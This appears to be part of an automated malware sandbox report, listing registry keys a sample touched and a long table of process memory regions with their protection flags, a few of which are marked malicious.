HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.102
CheckSetting
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive\Accounts
LastUpdate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive\Accounts
LastUpdate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive\Accounts
LastUpdate
There are 53 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
Download
CB0000
unclassified section
page execute and read and write
malicious
400000
remote allocation
page execute and read and write
malicious
B00000
system
page execute and read and write
malicious
DF0000
trusted library allocation
page read and write
malicious
7FF5BE7E8000
unkown
page readonly
CF36000
unkown
page read and write
BAAE000
stack
page read and write
7FF5BE6A5000
unkown
page readonly
CE9E000
unkown
page read and write
7FF5BE86B000
unkown
page readonly
7FFC3C930000
trusted library allocation
page read and write
7A68000
unkown
page read and write
8EC0000
unkown
page read and write
C5E8000
stack
page read and write
CD08000
unkown
page read and write
1A67D010000
heap
page read and write
7FF5BE903000
unkown
page readonly
7B53000
unkown
page read and write
7FF5BE298000
unkown
page readonly
8D7D000
stack
page read and write
A33A000
stack
page read and write
CB6F000
unkown
page read and write
9ACE000
unkown
page read and write
4DD1000
unkown
page read and write
2F20000
unclassified section
page execute and read and write
1A67B050000
trusted library allocation
page read and write
7FF5BE96E000
unkown
page readonly
C66A000
stack
page read and write
7FF5BE80C000
unkown
page readonly
CE4000
heap
page read and write
CB93000
unkown
page read and write
7FF5BE898000
unkown
page readonly
9952000
unkown
page read and write
7A6C000
unkown
page read and write
3649000
stack
page read and write
35C9000
direct allocation
page execute and read and write
22D201BB000
heap
page read and write
3356000
direct allocation
page execute and read and write
7FF5BE8FC000
unkown
page readonly
7FF5BE932000
unkown
page readonly
22D20240000
heap
page read and write
7A64000
unkown
page read and write
39B3000
unkown
page read and write
9DF2000
heap
page read and write
A9F0000
unkown
page read and write
7FF5BE4A3000
unkown
page readonly
22D201D8000
heap
page read and write
CC76000
unkown
page read and write
ABB5000
unkown
page read and write
7FF5BE76E000
unkown
page readonly
7FF5BE4A3000
unkown
page readonly
D6BD000
unkown
page read and write
97F0000
unkown
page readonly
2B59C61A000
heap
page read and write
B8F0000
unkown
page read and write
4D40000
unkown
page read and write
5700000
unkown
page write copy
2D30000
unclassified section
page execute and read and write
C93588D000
stack
page read and write
A9D5000
unkown
page read and write
CA7E000
stack
page read and write
37C0000
unkown
page read and write
2F2C6FA000
stack
page read and write
CE4000
heap
page read and write
7E80000
unkown
page read and write
3549000
stack
page read and write
1A600437000
trusted library allocation
page read and write
7FF5BEA4D000
unkown
page readonly
4D40000
unkown
page read and write
7FF5BE7F4000
unkown
page readonly
7B53000
unkown
page read and write
CE4000
heap
page read and write
9C06000
unkown
page read and write
7FF5BE97A000
unkown
page readonly
C9349F9000
stack
page read and write
9B49000
unkown
page read and write
7FF5BE96E000
unkown
page readonly
2EF0000
trusted library allocation
page read and write
7A84000
unkown
page read and write
7FF5BE9BB000
unkown
page readonly
9C1D000
unkown
page read and write
D7FE000
stack
page read and write
7FF5BE51A000
unkown
page readonly
1A600422000
trusted library allocation
page read and write
7A5C000
unkown
page read and write
9D000
stack
page read and write
CE4000
heap
page read and write
7FF5BE8FC000
unkown
page readonly
7FF5BE3E8000
unkown
page readonly
A107000
unkown
page read and write
7FF5BE6E3000
unkown
page readonly
AA8A000
unkown
page read and write
7FF5BE79A000
unkown
page readonly
7FF5BE33C000
unkown
page readonly
22D201DB000
heap
page read and write
4E0D000
unkown
page read and write
9D37000
unkown
page read and write
7FF5BE72C000
unkown
page readonly
CE83000
unkown
page read and write
C56F000
stack
page read and write
7FFC3C880000
trusted library allocation
page read and write
9992000
unkown
page read and write
7FF5BE9D0000
unkown
page readonly
CB54000
unkown
page read and write
7FF5BE7E6000
unkown
page readonly
7FF5BE52C000
unkown
page readonly
98CE000
stack
page read and write
3000000
heap
page read and write
2B59F912000
trusted library allocation
page read and write
CE9E000
unkown
page read and write
4EC0000
unkown
page read and write
7A42000
unkown
page read and write
8E7F000
stack
page read and write
9DF0000
heap
page read and write
2FB0000
unkown
page read and write
33CA000
stack
page read and write
CD3D000
unkown
page read and write
7FF5BE4EA000
unkown
page readonly
9B25000
unkown
page read and write
4E50000
unkown
page read and write
8FCB000
stack
page read and write
1A67D110000
heap
page read and write
7FF5BE787000
unkown
page readonly
7FF5BE81E000
unkown
page readonly
D6BE000
unkown
page read and write
5E5F000
stack
page read and write
CB54000
unkown
page read and write
7FF5BE71F000
unkown
page readonly
39C0000
unkown
page read and write
2D4F000
unclassified section
page execute and read and write
7FFC3C6CC000
trusted library allocation
page execute and read and write
7FF5BE9BE000
unkown
page readonly
9C1D000
unkown
page read and write
CE4000
heap
page read and write
7FF5BE8C4000
unkown
page readonly
1641000
unkown
page readonly
10C93000
unkown
page read and write
2B5A435F000
trusted library allocation
page read and write
CB5C000
unkown
page read and write
7DF4C9801000
unkown
page execute read
7FF5BE61A000
unkown
page readonly
D134000
unkown
page read and write
7FF5BE4DE000
unkown
page readonly
2B59C7D0000
heap
page read and write
7FF5BEA54000
unkown
page readonly
1695000
heap
page read and write
7FF5BE285000
unkown
page readonly
341C000
heap
page read and write
97F000
stack
page read and write
7FF5BE9C0000
unkown
page readonly
C9FB000
stack
page read and write
5F60000
trusted library allocation
page read and write
D37C000
stack
page read and write
314E000
heap
page read and write
3030000
unclassified section
page execute and read and write
7FFC3C860000
trusted library allocation
page read and write
2B5A395F000
trusted library allocation
page read and write
ABB5000
unkown
page read and write
7AC000
stack
page read and write
2F49000
heap
page read and write
22D20203000
heap
page read and write
7FF5BE7E2000
unkown
page readonly
7FF5BEA37000
unkown
page readonly
8009000
stack
page read and write
9D37000
unkown
page read and write
7FF5BE1DE000
unkown
page readonly
7FF5BE616000
unkown
page readonly
B7B0000
unkown
page readonly
CEF8000
unkown
page read and write
7FF5BEA1F000
unkown
page readonly
7FF5BE8BE000
unkown
page readonly
7FF5BE3D2000
unkown
page readonly
7890000
unkown
page read and write
1490000
heap
page read and write
B1F1000
unkown
page read and write
D008000
unkown
page read and write
7FF5BE69A000
unkown
page readonly
9ADA000
unkown
page read and write
CC6F000
unkown
page read and write
CE95000
unkown
page read and write
7FF5BEA59000
unkown
page readonly
4E70000
unkown
page read and write
22D201F3000
heap
page read and write
CB7B000
unkown
page read and write
7FF5BE6A1000
unkown
page readonly
7FF5BE501000
unkown
page readonly
7A64000
unkown
page read and write
22D2023D000
heap
page read and write
7FF5BE65C000
unkown
page readonly
CEFC000
unkown
page read and write
7A74000
unkown
page read and write
D11B000
unkown
page read and write
1A6003F5000
trusted library allocation
page read and write
1A600118000
trusted library allocation
page read and write
22D201DD000
heap
page read and write
D6B1000
unkown
page read and write
7FF5BE3F9000
unkown
page readonly
1630000
unkown
page read and write
9AC2000
unkown
page read and write
7FF5BE943000
unkown
page readonly
7FF5BE6D0000
unkown
page readonly
398C000
unkown
page read and write
7FF5BEA3D000
unkown
page readonly
1695000
heap
page read and write
8DF8000
stack
page read and write
1A600162000
trusted library allocation
page read and write
7FF5BEA40000
unkown
page readonly
E30000
system
page execute and read and write
3490000
unkown
page read and write
22D200B0000
heap
page read and write
2B59DF80000
heap
page read and write
7FF5BE64A000
unkown
page readonly
7FF5BE91F000
unkown
page readonly
CB87000
unkown
page read and write
9ACE000
unkown
page read and write
7FF5BE985000
unkown
page readonly
7FF5BE1C0000
unkown
page readonly
9C06000
unkown
page read and write
7A56000
unkown
page read and write
22D201D1000
heap
page read and write
2F3E000
heap
page read and write
7FF5BE685000
unkown
page readonly
CB7B000
unkown
page read and write
CB73000
unkown
page read and write
D134000
unkown
page read and write
7FF5BE9B3000
unkown
page readonly
A233000
unkown
page read and write
AA29000
unkown
page read and write
1A60040B000
trusted library allocation
page read and write
AA90000
unkown
page read and write
CE4000
heap
page read and write
9016000
unkown
page read and write
CF17000
unkown
page read and write
14DD000
heap
page read and write
2F40000
heap
page read and write
D6C2000
unkown
page read and write
10D54000
unkown
page read and write
7ADF000
unkown
page read and write
4DCC000
unkown
page read and write
1A67CF10000
heap
page read and write
7FFC3C830000
trusted library allocation
page read and write
4D68000
unkown
page read and write
7DF4C9800000
unkown
page readonly
CE4000
heap
page read and write
AB2D000
unkown
page read and write
CCBC000
unkown
page read and write
F3E9000
system
page execute and read and write
61A3FFF000
stack
page read and write
7FF5BE937000
unkown
page readonly
CF36000
unkown
page read and write
A5EE000
stack
page read and write
2F2CBFF000
stack
page read and write
C934BB8000
stack
page read and write
7FF5BE9E8000
unkown
page readonly
7FF5BE932000
unkown
page readonly
22D20195000
heap
page read and write
1A67CFE7000
heap
page read and write
7FF5BE4A7000
unkown
page readonly
4DD3000
unkown
page read and write
22D201B7000
heap
page read and write
AB52000
unkown
page read and write
7AA2000
unkown
page read and write
CE4000
heap
page read and write
7FF5BE9F2000
unkown
page readonly
7A58000
unkown
page read and write
7FF5BE5E2000
unkown
page readonly
7FFC3C7CA000
trusted library allocation
page read and write
7FF5BE9C9000
unkown
page readonly
D6B2000
unkown
page read and write
7FF5BE5E2000
unkown
page readonly
F2A5000
system
page execute and read and write
CB0B000
unkown
page read and write
349E000
stack
page read and write
A650000
unkown
page read and write
7FF5BE6D5000
unkown
page readonly
CDEC000
unkown
page read and write
2F30000
heap
page read and write
2EF0000
trusted library allocation
page read and write
10C93000
unkown
page read and write
7FF5BE9BB000
unkown
page readonly
A8CE000
stack
page read and write
7FFC3C870000
trusted library allocation
page read and write
D6C2000
unkown
page read and write
16A0000
unkown
page readonly
CE4000
heap
page read and write
133E000
stack
page read and write
22D20150000
heap
page read and write
7FF5BE77B000
unkown
page readonly
9950000
unkown
page read and write
1A67C9E7000
heap
page read and write
7A4C000
unkown
page read and write
A630000
unkown
page read and write
7FF5BE761000
unkown
page readonly
CE4000
heap
page read and write
1A67C917000
heap
page execute and read and write
3491000
heap
page read and write
2B59E026000
heap
page read and write
7FF5BE1C0000
unkown
page readonly
CE60000
unkown
page read and write
CE9E000
unkown
page read and write
2B59E486000
trusted library allocation
page read and write
78C000
heap
page read and write
7FF5BE5D8000
unkown
page readonly
D072000
unkown
page read and write
1A60008A000
trusted library allocation
page read and write
7FF5BE903000
unkown
page readonly
C93477E000
stack
page read and write
5700000
unkown
page write copy
7FF5BEA4D000
unkown
page readonly
A630000
unkown
page read and write
8A60000
unkown
page readonly
1A60010C000
trusted library allocation
page read and write
826E000
stack
page read and write
7FF5BE687000
unkown
page readonly
7FF5BE1B7000
unkown
page readonly
7FF5BE973000
unkown
page readonly
2B59C59A000
heap
page read and write
7C1D000
unkown
page read and write
3857000
stack
page read and write
7FF5BE873000
unkown
page readonly
CB6D000
unkown
page read and write
7FF5BEA32000
unkown
page readonly
7FF5BE9DC000
unkown
page readonly
7FF5BE481000
unkown
page readonly
7FF5BE729000
unkown
page readonly
7A6C000
unkown
page read and write
7FF5BE51D000
unkown
page readonly
3420000
heap
page read and write
AA75000
unkown
page read and write
A33A000
stack
page read and write
7FF5BE975000
unkown
page readonly
1A67B030000
trusted library allocation
page read and write
9AC6000
unkown
page read and write
7F50000
unkown
page readonly
61A463E000
stack
page read and write
7FF5BE4C3000
unkown
page readonly
22D20201000
heap
page read and write
B7A0000
unkown
page readonly
9C20000
unkown
page read and write
7FF5BE79A000
unkown
page readonly
7FF5BE457000
unkown
page readonly
AB5E000
unkown
page read and write
CBCA000
unkown
page read and write
7FF5BE6E3000
unkown
page readonly
B1F1000
unkown
page read and write
7FF5BE939000
unkown
page readonly
10D54000
unkown
page read and write
3251000
trusted library allocation
page execute and read and write
2B59E091000
trusted library allocation
page read and write
9AC6000
unkown
page read and write
AA79000
unkown
page read and write
D154000
unkown
page read and write
7A5A000
unkown
page read and write
C934DBE000
stack
page read and write
CE4000
heap
page read and write
CB00000
unkown
page read and write
1A600114000
trusted library allocation
page read and write
9083000
unkown
page read and write
7FF5BE6D5000
unkown
page readonly
9CE2000
unkown
page read and write
CB42000
unkown
page read and write
7FF5BE61A000
unkown
page readonly
AA08000
unkown
page read and write
D680000
unkown
page read and write
22D201DC000
heap
page read and write
39EF000
unclassified section
page read and write
7FF5BE501000
unkown
page readonly
7FF5BE64E000
unkown
page readonly
7FF5BE5F9000
unkown
page readonly
AA8E000
unkown
page read and write
7AC8000
unkown
page read and write
7FF5BE9E5000
unkown
page readonly
4E70000
unkown
page read and write
61A40FE000
stack
page read and write
22D201CE000
heap
page read and write
7FF5BE415000
unkown
page readonly
7FF5BEA66000
unkown
page readonly
32F3000
heap
page read and write
22D20129000
heap
page read and write
1670000
unkown
page read and write
FC0000
unkown
page readonly
9B06000
unkown
page read and write
CE4000
heap
page read and write
2B59E055000
heap
page read and write
22D201C6000
heap
page read and write
9DFA000
heap
page read and write
3175000
heap
page read and write
7FF5BE4D1000
unkown
page readonly
1A60011B000
trusted library allocation
page read and write
7FF5BE7D2000
unkown
page readonly
7FF5BE3E8000
unkown
page readonly
4DB9000
unkown
page read and write
7FF5BE0CC000
unkown
page readonly
22D20090000
heap
page read and write
CD3D000
unkown
page read and write
CE95000
unkown
page read and write
7FF5BE697000
unkown
page readonly
7FF5BE9C0000
unkown
page readonly
7AC5000
unkown
page read and write
7BAE000
unkown
page read and write
7FF5BE1B7000
unkown
page readonly
7FF5BE891000
unkown
page readonly
39C0000
unkown
page read and write
22D2012C000
heap
page read and write
A3C0000
unkown
page read and write
7FF5BE290000
unkown
page readonly
7FF5BE498000
unkown
page readonly
7FF5BEA12000
unkown
page readonly
7FF5BE3D2000
unkown
page readonly
1A67B040000
heap
page readonly
CE4000
heap
page read and write
14C1000
heap
page read and write
CE18000
unkown
page read and write
7FF5BE68A000
unkown
page readonly
1600000
unkown
page readonly
7D70000
unkown
page read and write
2F2CFFE000
stack
page read and write
F220000
system
page execute and read and write
13CA000
heap
page read and write
7DF4C9800000
unkown
page readonly
8BFF000
stack
page read and write
9C28000
unkown
page read and write
7FF5BE432000
unkown
page readonly
1A6006B8000
trusted library allocation
page read and write
B140000
unkown
page read and write
CE4000
heap
page read and write
22D201F3000
heap
page read and write
1A610011000
trusted library allocation
page read and write
1600000
unkown
page readonly
7FF5BE0E3000
unkown
page readonly
22D20178000
heap
page read and write
7FF5BE7E6000
unkown
page readonly
7A58000
unkown
page read and write
7F42000
unkown
page read and write
7FF5BE51A000
unkown
page readonly
7FF5BE838000
unkown
page readonly
CB85000
unkown
page read and write
1460000
heap
page read and write
D6B4000
unkown
page read and write
7FF5BE417000
unkown
page readonly
7FFC3C6C0000
trusted library allocation
page read and write
10FC000
stack
page read and write
9C1D000
unkown
page read and write
2E40000
unkown
page readonly
4E9A000
unkown
page read and write
780000
heap
page read and write
9DF2000
heap
page read and write
CB50000
unkown
page read and write
7A4C000
unkown
page read and write
7FF5BE744000
unkown
page readonly
3986000
unkown
page read and write
22D201DC000
heap
page read and write
7FF5BE1C9000
unkown
page readonly
8199000
stack
page read and write
7FF5BE9A3000
unkown
page readonly
22D21ED6000
heap
page read and write
2E50000
trusted library allocation
page execute and read and write
7FFC3C7D0000
trusted library allocation
page execute and read and write
93B8000
stack
page read and write
8030000
unkown
page readonly
AA3C000
unkown
page read and write
7FF5BE94B000
unkown
page readonly
9C0B000
unkown
page read and write
A640000
unkown
page readonly
35C9000
stack
page read and write
7FF5BE4AB000
unkown
page readonly
CEA7000
unkown
page read and write
A650000
unkown
page read and write
7DF4C97E1000
unkown
page execute read
9952000
unkown
page read and write
7FF5BE0E3000
unkown
page readonly
2B5A115F000
trusted library allocation
page read and write
5F70000
trusted library allocation
page read and write
8081000
unkown
page read and write
A540000
unkown
page read and write
7FF5BE45F000
unkown
page readonly
1529000
stack
page read and write
AB6A000
unkown
page read and write
8030000
unkown
page readonly
C934AB6000
stack
page read and write
CB77000
unkown
page read and write
CB75000
unkown
page read and write
F266000
system
page execute and read and write
7FF5BE422000
unkown
page readonly
D37C000
stack
page read and write
DF0000
trusted library allocation
page read and write
1A610001000
trusted library allocation
page read and write
4DCC000
unkown
page read and write
7FF5BE773000
unkown
page readonly
7FF5BE8F6000
unkown
page readonly
22D201E3000
heap
page read and write
7FF5BE5D2000
unkown
page readonly
918D000
stack
page read and write
7FF5BE646000
unkown
page readonly
BB2C000
stack
page read and write
7A7C000
unkown
page read and write
CE4000
heap
page read and write
83FE000
stack
page read and write
7FF5BE481000
unkown
page readonly
CEA7000
unkown
page read and write
7FF5BE93E000
unkown
page readonly
C93590D000
stack
page read and write
7FF5BE426000
unkown
page readonly
CBEB000
unkown
page read and write
A3BE000
stack
page read and write
7FF5BE7D2000
unkown
page readonly
A3C0000
unkown
page read and write
E49000
system
page execute and read and write
7FFC3C840000
trusted library allocation
page read and write
7FF5BEA1F000
unkown
page readonly
3049000
unclassified section
page execute and read and write
7FF5BE430000
unkown
page readonly
CB73000
unkown
page read and write
7B56000
unkown
page read and write
4E50000
unkown
page read and write
9996000
unkown
page read and write
7FF5BE6C7000
unkown
page readonly
8B7F000
stack
page read and write
7FFC3C820000
trusted library allocation
page read and write
C4EB000
stack
page read and write
7FF5BE495000
unkown
page readonly
7FF5BE715000
unkown
page readonly
8478000
stack
page read and write
301D000
trusted library allocation
page execute and read and write
363E000
direct allocation
page execute and read and write
A84F000
stack
page read and write
9AB1000
unkown
page read and write
7F42000
unkown
page read and write
7A62000
unkown
page read and write
CDED000
unkown
page read and write
D68C000
unkown
page read and write
7FF5BE1B0000
unkown
page readonly
8E7F000
stack
page read and write
7FF5BE9CD000
unkown
page readonly
7FF5BE4DE000
unkown
page readonly
B8D0000
unkown
page read and write
7FF5BE33C000
unkown
page readonly
61A42BF000
stack
page read and write
7BFF000
unkown
page read and write
B201000
unkown
page read and write
7FFC3C800000
trusted library allocation
page execute and read and write
7FF5BE71C000
unkown
page readonly
7A38000
unkown
page read and write
1A67C990000
heap
page read and write
7B56000
unkown
page read and write
4E80000
unkown
page read and write
2FE0000
unkown
page readonly
BB2C000
stack
page read and write
D6C6000
unkown
page read and write
7FF5BE6AE000
unkown
page readonly
39BA000
unkown
page read and write
BE2A000
stack
page read and write
4E25000
unkown
page read and write
9C22000
unkown
page read and write
10D14000
unkown
page read and write
7A52000
unkown
page read and write
7DF4C97E1000
unkown
page execute read
11D0000
heap
page read and write
4E3D000
unkown
page read and write
7FF5BE397000
unkown
page readonly
7FF5BE4E3000
unkown
page readonly
7FF5BE47C000
unkown
page readonly
22D201C1000
heap
page read and write
7FF5BE876000
unkown
page readonly
1A67D030000
heap
page read and write
AA8A000
unkown
page read and write
22D21A90000
heap
page read and write
D87F000
stack
page read and write
2F4A000
heap
page read and write
12E9000
heap
page read and write
4D82000
unkown
page read and write
4D7B000
unkown
page read and write
99E5000
unkown
page read and write
7FF5BE891000
unkown
page readonly
7FF5BE969000
unkown
page readonly
97E0000
unkown
page readonly
22D20129000
heap
page read and write
CB77000
unkown
page read and write
2D4B000
unclassified section
page execute and read and write
C9347FA000
stack
page read and write
5858000
unkown
page read and write
2F2C7FE000
stack
page read and write
7F70000
unkown
page read and write
7B56000
unkown
page read and write
8081000
unkown
page read and write
7FF5BE815000
unkown
page readonly
8BFF000
stack
page read and write
C934B3E000
stack
page read and write
C46B000
stack
page read and write
22D2019F000
heap
page read and write
7FF5BEA37000
unkown
page readonly
CB91000
unkown
page read and write
61A41FE000
stack
page read and write
61A417E000
stack
page read and write
CE4000
heap
page read and write
A680000
heap
page read and write
9E0000
heap
page read and write
7FF5BE61F000
unkown
page readonly
38D3000
stack
page read and write
7A42000
unkown
page read and write
22D201C8000
heap
page read and write
C93497E000
stack
page read and write
39AD000
unkown
page read and write
7FF5BE50D000
unkown
page readonly
7FF5BE4D1000
unkown
page readonly
7FF5BE8B4000
unkown
page readonly
A660000
unkown
page read and write
2B59E48B000
trusted library allocation
page read and write
397A000
unkown
page read and write
7BB1000
unkown
page read and write
A560000
unkown
page read and write
7FF5BE565000
unkown
page readonly
7FF5BE8AB000
unkown
page readonly
1A67AD90000
heap
page read and write
37E2000
direct allocation
page execute and read and write
7FF5BE91F000
unkown
page readonly
2B5A2F5F000
trusted library allocation
page read and write
7FF5BE426000
unkown
page readonly
7FF5BE478000
unkown
page readonly
7FF5BE51D000
unkown
page readonly
4E60000
unkown
page read and write
7A3A000
unkown
page read and write
39A2000
unkown
page read and write
8F00000
unkown
page readonly
8480000
unkown
page read and write
7FF5BE4E7000
unkown
page readonly
CC79000
unkown
page read and write
1A600106000
trusted library allocation
page read and write
AB54000
unkown
page read and write
B920000
unkown
page read and write
AB6A000
unkown
page read and write
9AF0000
unkown
page read and write
9CEC000
unkown
page read and write
2B59E080000
heap
page read and write
8009000
stack
page read and write
7FF5BE687000
unkown
page readonly
7FF5BE4AB000
unkown
page readonly
7FFC3C850000
trusted library allocation
page read and write
7A74000
unkown
page read and write
CE4000
heap
page read and write
1630000
unkown
page read and write
7FF5BE6A5000
unkown
page readonly
7A60000
unkown
page read and write
39BA000
unkown
page read and write
A9D8000
unkown
page read and write
12B0000
unkown
page readonly
7FF5BE8F6000
unkown
page readonly
A660000
unkown
page read and write
1A67AFD1000
heap
page read and write
C7FF000
stack
page read and write
CBE3000
unkown
page read and write
2B59C590000
heap
page read and write
7C1D000
unkown
page read and write
2B59E493000
trusted library allocation
page read and write
9AF0000
unkown
page read and write
7FF5BE989000
unkown
page readonly
CF27000
unkown
page read and write
2F2CAFF000
stack
page read and write
7FF5BE7F7000
unkown
page readonly
7FF5BE4D6000
unkown
page readonly
A680000
heap
page read and write
CB8F000
unkown
page read and write
3771000
direct allocation
page execute and read and write
7E80000
unkown
page read and write
4D46000
unkown
page read and write
B790000
unkown
page read and write
22D21EDB000
heap
page read and write
3780000
unkown
page readonly
9659000
stack
page read and write
57AA000
unkown
page read and write
2EF0000
trusted library allocation
page read and write
9B25000
unkown
page read and write
31B9000
direct allocation
page execute and read and write
C935A0C000
stack
page read and write
22D2012D000
heap
page read and write
7FF5BE1C9000
unkown
page readonly
2B59C615000
heap
page read and write
2B59E2B2000
trusted library allocation
page read and write
7FF5BE0E7000
unkown
page readonly
7FF5BE514000
unkown
page readonly
CEFC000
unkown
page read and write
BAAE000
stack
page read and write
7BBA000
unkown
page read and write
CE4000
heap
page read and write
1670000
unkown
page read and write
CBAF000
unkown
page read and write
7FF5BE943000
unkown
page readonly
CB68000
unkown
page read and write
A5EE000
stack
page read and write
7FF5BE77B000
unkown
page readonly
7FF5BE3CD000
unkown
page readonly
AA44000
unkown
page read and write
1A67AF55000
heap
page read and write
3240000
trusted library allocation
page execute and read and write
22D201D8000
heap
page read and write
CF27000
unkown
page read and write
10CD6000
unkown
page read and write
D6C6000
unkown
page read and write
99E5000
unkown
page read and write
7FF5BE523000
unkown
page readonly
7FF5BE779000
unkown
page readonly
7E90000
unkown
page read and write
D6C2000
unkown
page read and write
7FF5BE43B000
unkown
page readonly
38E0000
unkown
page readonly
9A4D000
unkown
page read and write
7FF5BE87F000
unkown
page readonly
7FFC3C614000
trusted library allocation
page read and write
520000
heap
page read and write
2B59C690000
trusted library section
page read and write
7FF5BE3CA000
unkown
page readonly
CE4000
heap
page read and write
22D2012C000
heap
page read and write
CBEB000
unkown
page read and write
7FF5BE6D3000
unkown
page readonly
7FF5BE8AB000
unkown
page readonly
22D20159000
heap
page read and write
10F8F000
system
page read and write
CD08000
unkown
page read and write
7F30000
unkown
page read and write
D05A000
unkown
page read and write
CE4000
heap
page read and write
D160000
unkown
page read and write
CD43000
unkown
page read and write
CB91000
unkown
page read and write
1A67AF43000
heap
page read and write
61A407C000
stack
page read and write
7FF5BE94B000
unkown
page readonly
7FF5BEA48000
unkown
page readonly
7FF5BE3DF000
unkown
page readonly
37C0000
unkown
page read and write
7FF5AACB4000
unkown
page readonly
CE4000
heap
page read and write
7A56000
unkown
page read and write
9109000
stack
page read and write
322E000
direct allocation
page execute and read and write
4E25000
unkown
page read and write
2B59E079000
heap
page read and write
8480000
unkown
page read and write
22D21EE2000
heap
page read and write
5F70000
trusted library allocation
page read and write
CEF0000
unkown
page read and write
B8E0000
unkown
page readonly
7FF5BE876000
unkown
page readonly
9B06000
unkown
page read and write
7DF4C97F1000
unkown
page execute read
1A67C9E0000
heap
page read and write
7FF5BE92F000
unkown
page readonly
7FF5BE58E000
unkown
page readonly
CB60000
unkown
page read and write
C60000
heap
page read and write
C66A000
stack
page read and write
22D2018F000
heap
page read and write
A94E000
stack
page read and write
7FF5BE9F2000
unkown
page readonly
CB7D000
unkown
page read and write
7DF4C97E0000
unkown
page readonly
7FF5BE6B1000
unkown
page readonly
F3EB000
system
page execute and read and write
7FF5BE55D000
unkown
page readonly
7FF5BE744000
unkown
page readonly
A107000
unkown
page read and write
7FF5BE895000
unkown
page readonly
9109000
stack
page read and write
7FF5BEA3D000
unkown
page readonly
1A67AF3B000
heap
page read and write
10CD6000
unkown
page read and write
13D9000
heap
page read and write
7FF5BE6C3000
unkown
page readonly
8D7D000
stack
page read and write
CE0000
heap
page read and write
7C1D000
unkown
page read and write
CF36000
unkown
page read and write
7FF5BE335000
unkown
page readonly
39AF000
unkown
page read and write
1A600109000
trusted library allocation
page read and write
7FF5BE495000
unkown
page readonly
C93467E000
stack
page read and write
7BBB000
unkown
page read and write
2B59E075000
heap
page read and write
B640000
unkown
page readonly
7FF5BE697000
unkown
page readonly
2F3A000
heap
page read and write
CE4000
heap
page read and write
7F50000
unkown
page readonly
C20000
trusted library allocation
page read and write
7FF5BE9A3000
unkown
page readonly
8C7F000
stack
page read and write
7FF5BE9B3000
unkown
page readonly
5858000
unkown
page read and write
39AB000
unkown
page read and write
4D80000
unkown
page read and write
7FF5AACAE000
unkown
page readonly
D160000
unkown
page read and write
7BA3000
unkown
page read and write
33D8000
direct allocation
page execute and read and write
B5FD000
stack
page read and write
1A67CFB2000
heap
page read and write
7FF5BE76B000
unkown
page readonly
2F49000
heap
page read and write
A2BD000
stack
page read and write
7A62000
unkown
page read and write
7FF5BE5A1000
unkown
page readonly
14E0000
heap
page read and write
1A60055E000
trusted library allocation
page read and write
2F2E000
stack
page read and write
7FF5BE911000
unkown
page readonly
D042000
unkown
page read and write
5F70000
trusted library allocation
page read and write
22D21EE2000
heap
page read and write
CB42000
unkown
page read and write
7FF5BE478000
unkown
page readonly
81B0000
unkown
page readonly
7D70000
unkown
page read and write
4DD3000
unkown
page read and write
7FF5BE985000
unkown
page readonly
57D6000
unkown
page read and write
7FF5BE75C000
unkown
page readonly
7FF5BE73E000
unkown
page readonly
2F2CDFE000
stack
page read and write
143F000
stack
page read and write
97DA000
stack
page read and write
2B5A255F000
trusted library allocation
page read and write
8B7F000
stack
page read and write
9221000
unkown
page read and write
7FF5BE4D6000
unkown
page readonly
9968000
unkown
page read and write
7FF5BE44D000
unkown
page readonly
CBBE000
unkown
page read and write
D87F000
stack
page read and write
10D14000
unkown
page read and write
4E07000
unkown
page read and write
4E3D000
unkown
page read and write
7A30000
unkown
page read and write
81A0000
unkown
page read and write
344A000
stack
page read and write
7FF5BE4C6000
unkown
page readonly
AFC000
stack
page read and write
22D201F3000
heap
page read and write
9CEC000
unkown
page read and write
7FF5BE81E000
unkown
page readonly
2B59C530000
trusted library allocation
page read and write
7FF5BE939000
unkown
page readonly
7FF5BE7D8000
unkown
page readonly
22D201F3000
heap
page read and write
7FF5BE787000
unkown
page readonly
2F2C8FE000
stack
page read and write
1A6006AC000
trusted library allocation
page read and write
7FF5BE80C000
unkown
page readonly
22D21ED0000
heap
page read and write
1A30000
unkown
page readonly
22D201C0000
heap
page read and write
B1F1000
unkown
page read and write
7FF5BE9D0000
unkown
page readonly
7E70000
unkown
page read and write
CB95000
unkown
page read and write
7FF5BE32D000
unkown
page readonly
7FF5BEA12000
unkown
page readonly
F3FB000
system
page execute and read and write
4D96000
unkown
page read and write
7A98000
unkown
page read and write
37A0000
unkown
page readonly
9C20000
unkown
page read and write
7FF5BE6C3000
unkown
page readonly
B1FE000
unkown
page read and write
9CDE000
unkown
page read and write
7FFC3C7E0000
trusted library allocation
page execute and read and write
C934A3E000
stack
page read and write
CB6F000
unkown
page read and write
7FF5BE98D000
unkown
page readonly
9B49000
unkown
page read and write
61A3E73000
stack
page read and write
5F5F000
stack
page read and write
7FF5BE69A000
unkown
page readonly
AB50000
unkown
page read and write
1A60052D000
trusted library allocation
page read and write
7DF4C9801000
unkown
page execute read
AB60000
unkown
page read and write
4D96000
unkown
page read and write
22D21EEF000
heap
page read and write
2B59C770000
heap
page execute and read and write
B5FD000
stack
page read and write
C934CBE000
stack
page read and write
7FF5BEA35000
unkown
page readonly
7FFC3C6C6000
trusted library allocation
page read and write
7FFC3C900000
trusted library allocation
page read and write
9992000
unkown
page read and write
1A67CBC0000
heap
page execute and read and write
9AB4000
unkown
page read and write
8A30000
unkown
page readonly
22D201B2000
heap
page read and write
D6E3000
unkown
page read and write
CAFF000
stack
page read and write
7E90000
unkown
page read and write
7FF5BE4EA000
unkown
page readonly
2B59E4F8000
trusted library allocation
page read and write
4D46000
unkown
page read and write
A84F000
stack
page read and write
341E000
stack
page read and write
1A67D11A000
heap
page read and write
7FF5BE5D4000
unkown
page readonly
7FF5BE5D4000
unkown
page readonly
CC79000
unkown
page read and write
399A000
unkown
page read and write
1A67C910000
heap
page execute and read and write
BC0E000
unkown
page execute and read and write
C20000
trusted library allocation
page read and write
78B0000
unkown
page read and write
